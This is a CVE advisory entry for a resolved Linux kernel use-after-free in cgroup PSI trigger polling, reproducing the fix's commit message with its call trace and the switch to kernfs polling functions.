CVE-2023-54019

In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> sched/psi: use kernfs polling functions for PSI trigger polling<br /> <br /> Destroying psi trigger in cgroup_file_release causes UAF issues when<br /> a cgroup is removed from under a polling process. This is happening<br /> because cgroup removal causes a call to cgroup_file_release while the<br /> actual file is still alive. Destroying the trigger at this point would<br /> also destroy its waitqueue head and if there is still a polling process<br /> on that file accessing the waitqueue, it will step on the freed pointer:<br /> <br /> do_select<br /> vfs_poll<br /> do_rmdir<br /> cgroup_rmdir<br /> kernfs_drain_open_files<br /> cgroup_file_release<br /> cgroup_pressure_release<br /> psi_trigger_destroy<br /> wake_up_pollfree(&amp;t-&gt;event_wait)<br /> // vfs_poll is unblocked<br /> synchronize_rcu<br /> kfree(t)<br /> poll_freewait -&gt; UAF access to the trigger&amp;#39;s waitqueue head<br /> <br /> Patch [1] fixed this issue for epoll() case using wake_up_pollfree(),<br /> however the same issue exists for synchronous poll() case.<br /> The root cause of this issue is that the lifecycles of the psi trigger&amp;#39;s<br /> waitqueue and of the file associated with the trigger are different. Fix<br /> this by using kernfs_generic_poll function when polling on cgroup-specific<br /> psi triggers. It internally uses kernfs_open_node-&gt;poll waitqueue head<br /> with its lifecycle tied to the file&amp;#39;s lifecycle. This also renders the<br /> fix in [1] obsolete, so revert it.<br /> <br /> [1] commit c2dbe32d5db5 ("sched/psi: Fix use-after-free in ep_remove_wait_queue()")